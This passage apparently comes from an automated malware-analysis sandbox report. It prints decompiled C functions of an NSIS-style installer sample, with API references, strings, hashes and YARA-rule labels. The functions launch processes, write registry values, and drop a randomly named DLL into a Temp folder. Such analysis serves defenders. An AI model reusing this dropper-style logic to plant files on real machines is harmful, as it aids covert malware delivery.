Part of subcall function 00404D7E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E2C
Part of subcall function 00404D7E: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E3A

Part of subcall function 00405263: GetFileAttributesA.KERNEL32(?), ref: 00405276
Part of subcall function 00405263: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,0042C8A8,00000000), ref: 0040529F
Part of subcall function 00405263: CloseHandle.KERNEL32(?), ref: 004052AC

WaitForSingleObject.KERNEL32(?,00000064,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401EDB
GetExitCodeProcess.KERNEL32 ref: 00401EEB
CloseHandle.KERNEL32(?,00000000,C:\Users\user\AppData\Local\Temp,000000EB,00000000), ref: 00401F10

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401EAC

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 4003922372-47812868
Opcode ID: 5a5e0ab474501c0c8cdce6a7dad8f641a45737d556ca6cc8df0d2412e5647019
Instruction ID: 5373abc2601613a98f28ad4f4965e42200fdcae42bb0af3ca7e989b3915abbb6
Opcode Fuzzy Hash: 5a5e0ab474501c0c8cdce6a7dad8f641a45737d556ca6cc8df0d2412e5647019
Instruction Fuzzy Hash: 7F018031904119EBCF12AFE1DD85A9E7672EF00355F20403BF201B61E1D3B94A419F9E

Uniqueness

Uniqueness Score: -1.00%

Function 00405263, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405263(CHAR* _a4, CHAR* _a8) {
				struct _PROCESS_INFORMATION _v20;
				signed char _t10;
				int _t12;

				0x42c8a8->cb = 0x44;
				_t10 = GetFileAttributesA(_a8);
				if(_t10 == 0xffffffff || (_t10 & 0x00000010) == 0) {
					_a8 = 0;
				}
				_t12 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, _a8, 0x42c8a8,  &_v20);
				if(_t12 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t12;
			}

0x0040526c
0x00405276
0x00405281
0x00405287
0x00405287
0x0040529f
0x004052a7
0x004052ac
0x00000000
0x004052b2
0x004052b6

APIs

GetFileAttributesA.KERNEL32(?), ref: 00405276
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,0042C8A8,00000000), ref: 0040529F
CloseHandle.KERNEL32(?), ref: 004052AC

Strings

Error launching installer, xrefs: 00405263

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesCloseCreateFileHandleProcess
String ID: Error launching installer
API String ID: 2000254098-66219284
Opcode ID: b954777e46e2876cd2b16df8f0a664f49a3cb908b9b64b83fc78111bb65668c0
Instruction ID: 569e459230bed8030f36cb91adc98a8a2728fe2275d92c1c3a76062f46c74d15
Opcode Fuzzy Hash: b954777e46e2876cd2b16df8f0a664f49a3cb908b9b64b83fc78111bb65668c0
Instruction Fuzzy Hash: 7AF01C70900209AFDB046FA4DC49AAF7B64FF04315B50862AFD25A52E0E739E5158F69

Uniqueness

Uniqueness Score: -1.00%

Function 004054E8, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054E8(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}

0x004054e9
0x00405500
0x00405508
0x00405508
0x00405510

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403150,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 004054EE
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403150,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031CE), ref: 004054F7
lstrcatA.KERNEL32(?,00409010), ref: 00405508

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004054E8

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
Instruction ID: b17aae5b68b8bc80d4c61b0fd94ca46693d6836576485c9dca8ad087ab612ca9
Opcode Fuzzy Hash: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
Instruction Fuzzy Hash: 7BD0A9A2609A70BAD20227599C05E8B2A18CF46320B040022F140B22D2C23C1D81DFEE

Uniqueness

Uniqueness Score: -1.00%

Function 00402386, Relevance: 6.1, APIs: 4, Instructions: 69
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00402386(void* __eax, void* __eflags) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t33;
				void* _t35;

				_t15 = E00402B61(__eax);
				_t33 =  *((intOrPtr*)(_t35 - 0x14));
				 *(_t35 - 0x30) =  *(_t35 - 0x10);
				 *(_t35 - 0x44) = E00402A9A(2);
				_t18 = E00402A9A(0x11);
				 *(_t35 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
				if(_t19 == 0) {
					if(_t33 == 1) {
						E00402A9A(0x23);
						_t19 = lstrlenA(0x40a440) + 1;
					}
					if(_t33 == 4) {
						_t24 = E00402A7D(3);
						 *0x40a440 = _t24;
						_t19 = _t33;
					}
					if(_t33 == 3) {
						_t19 = E00402EBD( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a440, 0xc00);
					}
					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a440, _t19) == 0) {
						 *(_t35 - 4) = _t27;
					}
					_push( *(_t35 + 8));
					RegCloseKey();
				}
				 *0x42f4a8 =  *0x42f4a8 +  *(_t35 - 4);
				return 0;
			}

0x00402387
0x0040238c
0x00402396
0x004023a0
0x004023a3
0x004023b5
0x004023bc
0x004023c4
0x004023d2
0x004023d6
0x004023e1
0x004023e1
0x004023e5
0x004023e9
0x004023ef
0x004023f4
0x004023f4
0x004023f8
0x00402404
0x00402404
0x0040241d
0x0040241f
0x0040241f
0x00402422
0x004024fb
0x004024fb
0x00402932
0x0040293e

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023BC
lstrlenA.KERNEL32(0040A440,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023DC
RegSetValueExA.ADVAPI32(?,?,?,?,0040A440,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402415
RegCloseKey.ADVAPI32(?,?,?,0040A440,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024FB

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 56d13097dc24f25ff427fc816b00db1f9c4e98885d62d1f8789f5a0823319cc5
Instruction ID: 1c94cea9ba90df93ca58bd4285a9e0d6cf73b35acad62412febfb939eac80851
Opcode Fuzzy Hash: 56d13097dc24f25ff427fc816b00db1f9c4e98885d62d1f8789f5a0823319cc5
Instruction Fuzzy Hash: 1111AFB1E00208BFEB10AFA5DE4DEAF767CEB50758F10003AF904B61C1D6B85D019A69

Uniqueness

Uniqueness Score: -1.00%

Function 00401F4B, Relevance: 6.1, APIs: 4, Instructions: 56
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401F4B(char __ebx, char* __edi, char* __esi) {
				char* _t21;
				int _t22;
				void* _t33;

				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
				_t21 = E00402A9A(0xffffffee);
				 *(_t33 - 0x2c) = _t21;
				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30);
				 *__esi = __ebx;
				 *(_t33 - 8) = _t22;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t33 - 4)) = 1;
				if(_t22 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp - 0x34) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp + 8;
							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
								 *(__ebp + 8) = E00405939(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8)));
								 *(__ebp + 8) = E00405939(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp - 0x34));
						GlobalFree();
					}
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}

0x00401f50
0x00401f53
0x00401f5b
0x00401f60
0x00401f65
0x00401f69
0x00401f6c
0x00401f6e
0x00401f75
0x00401f7e
0x00401f86
0x00401f89
0x00401f9e
0x00401fa4
0x00401fb7
0x00401fc0
0x00401fcc
0x00401fd1
0x00401fd1
0x00401fb7
0x00401fd4
0x00401be1
0x00401be1
0x00401f89
0x00402932
0x0040293e

APIs

GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F60
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F7E
GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F97
VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FB0

Part of subcall function 00405939: wsprintfA.USER32 ref: 00405946

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 41675a64441fc20307d915f0227df61db49755b7bd11a5d40871c3fee6e4e729
Instruction ID: e4d099bb47c36cba02d0065e41ba721c83b3d665ff7f953a0667131b869b9819
Opcode Fuzzy Hash: 41675a64441fc20307d915f0227df61db49755b7bd11a5d40871c3fee6e4e729
Instruction Fuzzy Hash: 1F1116B1900108EEDB01DFE5D9859EEBBB9EF04344F20803AF501F61A1D7789A54DB28

Uniqueness

Uniqueness Score: -1.00%

Function 004021F6, Relevance: 6.1, APIs: 4, Instructions: 51
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004021F6() {
				void* __ebx;
				char _t33;
				CHAR* _t35;
				CHAR* _t38;
				void* _t40;

				_t35 = E00402A9A(_t33);
				 *(_t40 + 8) = _t35;
				_t38 = E00402A9A(0x11);
				 *(_t40 - 0x64) =  *(_t40 - 8);
				 *((intOrPtr*)(_t40 - 0x60)) = 2;
				( &(_t35[1]))[lstrlenA(_t35)] = _t33;
				( &(_t38[1]))[lstrlenA(_t38)] = _t33;
				E004059FD(_t33, 0x40a440, _t38, 0x40a440, 0xfffffff8);
				lstrcatA(0x40a440, _t38);
				 *(_t40 - 0x5c) =  *(_t40 + 8);
				 *(_t40 - 0x58) = _t38;
				 *(_t40 - 0x4a) = 0x40a440;
				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c));
				E00404D7E(_t33, 0x40a440);
				if(SHFileOperationA(_t40 - 0x64) != 0) {
					E00404D7E(0xfffffff9, _t33);
					 *((intOrPtr*)(_t40 - 4)) = 1;
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t40 - 4));
				return 0;
			}

0x004021fc
0x00402200
0x00402208
0x0040220e
0x00402211
0x0040221e
0x0040222f
0x00402233
0x0040223a
0x00402243
0x0040224b
0x0040224e
0x00402251
0x00402255
0x00402266
0x0040226f
0x004026da
0x004026da
0x00402932
0x0040293e

APIs

lstrlenA.KERNEL32 ref: 00402218
lstrlenA.KERNEL32(00000000), ref: 00402222
lstrcatA.KERNEL32(0040A440,00000000,0040A440,000000F8,00000000), ref: 0040223A

Part of subcall function 00404D7E: lstrlenA.KERNEL32(0042A080,00000000,0041A058,73BCEA30,?,?,?,?,?,?,?,?,?,00403018,00000000,?), ref: 00404DB7
Part of subcall function 00404D7E: lstrlenA.KERNEL32(00403018,0042A080,00000000,0041A058,73BCEA30,?,?,?,?,?,?,?,?,?,00403018,00000000), ref: 00404DC7
Part of subcall function 00404D7E: lstrcatA.KERNEL32(0042A080,00403018,00403018,0042A080,00000000,0041A058,73BCEA30), ref: 00404DDA
Part of subcall function 00404D7E: SetWindowTextA.USER32(0042A080,0042A080), ref: 00404DEC
Part of subcall function 00404D7E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E12
Part of subcall function 00404D7E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E2C
Part of subcall function 00404D7E: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E3A

SHFileOperationA.SHELL32(?,?,0040A440,0040A440,00000000,0040A440,000000F8,00000000), ref: 0040225E

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
String ID:
API String ID: 3674637002-0
Opcode ID: c237d85bab7d5b7f9d91a756771a76c1e0cf33c16846e85dec699fb32a0fce7f
Instruction ID: 7d0402f7bcad65a2a3fbaa89d286b4c3fac030f19c38f74fe4853062ba68fef2
Opcode Fuzzy Hash: c237d85bab7d5b7f9d91a756771a76c1e0cf33c16846e85dec699fb32a0fce7f
Instruction Fuzzy Hash: 6E1186B1904259ABCB00EFEA894499EB7F8DF45314F10413BB114FB2D1D678C945DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401D8E, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00401D8E() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x409400->lfHeight =  ~(MulDiv(E00402A7D(2), _t6, 0x48));
				 *0x409410 = E00402A7D(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x409417 = 1;
				 *0x409414 = _t11 & 0x00000001;
				 *0x409415 = _t11 & 0x00000002;
				 *0x409416 = _t11 & 0x00000004;
				E004059FD(_t18, _t24, _t26, 0x40941c,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x409400);
				_push(_t14);
				_push(_t26);
				E00405939();
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}

0x00401d9c
0x00401db5
0x00401dbf
0x00401dc4
0x00401dcf
0x00401dd6
0x00401de8
0x00401dee
0x00401df3
0x00401dfd
0x00402536
0x00401581
0x004028d7
0x00402932
0x0040293e

APIs

GetDC.USER32(?), ref: 00401D95
GetDeviceCaps.GDI32(00000000), ref: 00401D9C
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DAB
CreateFontIndirectA.GDI32(00409400), ref: 00401DFD

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontIndirect
String ID:
API String ID: 3272661963-0
Opcode ID: 921b8d9f80d85dae4e5c0b3fab4b65544386c45d95e077db1074512b697c4466
Instruction ID: 0bf8db4aad66ff6bc29ff827cc3fc14c5ec2529e919bd09f72257f1192ea8504
Opcode Fuzzy Hash: 921b8d9f80d85dae4e5c0b3fab4b65544386c45d95e077db1074512b697c4466
Instruction Fuzzy Hash: B0F0627194C650BFE7015BB0AE1ABAA3F64A755305F148479F241BA1E3C7BC0906CB7E

Uniqueness

Uniqueness Score: -1.00%

Function 00404CBD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404CBD(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t19;
				long _t23;

				if(_a8 != 0x102) {
					__eflags = _a8 - 2;
					if(_a8 == 2) {
						 *0x40929c =  *0x40929c | 0xffffffff;
						__eflags =  *0x40929c;
					}
					__eflags = _a8 - 0x200;
					if(_a8 != 0x200) {
						_t23 = _a16;
						goto L9;
					} else {
						_t19 = IsWindowVisible(_a4);
						__eflags = _t19;
						if(_t19 == 0) {
							L12:
							_t23 = _a16;
							L13:
							return CallWindowProcA( *0x42a894, _a4, _a8, _a12, _t23);
						}
						_t23 = E00404643(_a4, 1);
						_a8 = 0x419;
						L9:
						__eflags = _a8 - 0x419;
						if(_a8 == 0x419) {
							__eflags =  *0x40929c - _t23; // 0xffffffff
							if(__eflags != 0) {
								 *0x40929c = _t23;
								E004059DB(0x42a8a0, 0x430000);
								E00405939(0x430000, _t23);
								E00401410(6);
								E004059DB(0x430000, 0x42a8a0);
							}
						}
						goto L13;
					}
				}
				if(_a12 == 0x20) {
					E00403E0F(0x413);
					return 0;
				}
				goto L12;
			}

0x00404cc9
0x00404ce6
0x00404cea
0x00404cec
0x00404cec
0x00404cec
0x00404cf3
0x00404cff
0x00404d1f
0x00000000
0x00404d01
0x00404d04
0x00404d0a
0x00404d0c
0x00404d5f
0x00404d5f
0x00404d62
0x00000000
0x00404d72
0x00404d18
0x00404d1a
0x00404d22
0x00404d22
0x00404d25
0x00404d27
0x00404d2d
0x00404d3c
0x00404d42
0x00404d49
0x00404d50
0x00404d57
0x00404d5c
0x00404d2d
0x00000000
0x00404d25
0x00404cff
0x00404ccf
0x00404cda
0x00000000
0x00404cdf
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00404D04
CallWindowProcA.USER32 ref: 00404D72

Part of subcall function 00403E0F: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403E21

Strings

, xrefs: 00404CCB

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 931c6e2d3452623f2a390e01c489404f436308da2a52d275820346ecfe2c3dce
Instruction ID: 4a2947fe1ef1853657b0cd68643acdbb852dff1bff70307e7b65a93a25d4428a
Opcode Fuzzy Hash: 931c6e2d3452623f2a390e01c489404f436308da2a52d275820346ecfe2c3dce
Instruction Fuzzy Hash: 11117CB1500208FBDF21AF12DC45A9B3B69AF84764F00813BFB18791E2C3784D519FA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040253C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040253C(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
					_t7 = lstrlenA(E00402A9A(0x11));
				} else {
					E00402A7D(1);
					 *0x40a040 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405952(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x0040253c
0x0040253c
0x0040253f
0x0040255a
0x00402541
0x00402543
0x00402548
0x0040254f
0x00402561
0x004026da
0x004026da
0x00402567
0x00402579
0x004015c8
0x004015ca
0x00000000
0x004015d0
0x004015ca
0x00402932
0x0040293e

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 0040255A
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll,00000000,?,?,00000000,00000011), ref: 00402579

Strings

C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll, xrefs: 00402548, 0040256D

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsl6058.tmp\e4utfxiuc.dll
API String ID: 427699356-3992320418
Opcode ID: 460f3d3385c81f9ab123a651ab7910130a28ee13f4182e9bce0e3a7b0b2bcfdd
Instruction ID: 58c959ba46dee6b8a5e8613f63768173e8f239850a52820b4ff069945e253713
Opcode Fuzzy Hash: 460f3d3385c81f9ab123a651ab7910130a28ee13f4182e9bce0e3a7b0b2bcfdd
Instruction Fuzzy Hash: 21F0B4B1A04245BFD710EBA59D19BAB3664AB00304F10043BB202B60C2C6BC49419B6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040552F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040552F(char* _a4) {
				char* _t3;
				char* _t4;

				_t4 = _a4;
				_t3 =  &(_t4[lstrlenA(_t4)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t4, _t3);
					if(_t3 > _t4) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return _t3;
			}

0x00405530
0x0040553a
0x0040553c
0x00405543
0x0040554b
0x00000000
0x00000000
0x00000000
0x0040554b
0x0040554d
0x00405551

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00405535
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00405543

Strings

C:\Users\user\Desktop, xrefs: 0040552F

Memory Dump Source

Source File: 00000001.00000002.703506030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.703501549.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703512735.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.703519233.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703528650.0000000000414000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703538539.0000000000420000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703576080.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703598048.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.703605312.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
Instruction ID: 889218ce53f6b8cf1f9f6a2aaa16a781c12a56784fee4b43009738821d70e769
Opcode Fuzzy Hash: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
